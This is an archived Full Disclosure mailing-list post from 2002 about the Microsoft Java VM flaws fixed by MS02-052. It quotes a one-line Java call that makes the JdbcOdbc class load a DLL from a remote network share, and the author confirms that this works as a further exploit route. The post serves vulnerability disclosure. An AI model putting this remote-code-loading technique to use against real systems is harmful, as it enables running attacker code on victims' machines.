Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Technical information about the vulnerabilities fixed by MS-02-52

From: jouko () solutions fi (Jouko Pynnonen)
Date: Mon, 23 Sep 2002 18:41:15 +0300 (EEST)

On Mon, 23 Sep 2002, Georgi Guninski wrote:


Does
new com.ms.jdbc.odbc.JdbcOdbc("\\\\1.1.1.1\\share\\dll\000");
work?



Yes, seems to work, so there's another way to exploit this one. It 
requires that browsing internet shares works, which may limit the systems 
where it can be exploited. Although there were other Java vulnerabilities 
involving the use of shares, I never came to think about this way. MS may 
have thought of this, but of course they don't mention this kind of 
things during the "co-operation".


-- 
Jouko Pynnonen          Online Solutions Ltd       Secure your Linux -
jouko () solutions fi      http://www.solutions.fi    http://www.secmod.com
Previous By Date Next
Previous By Thread Next

Current thread: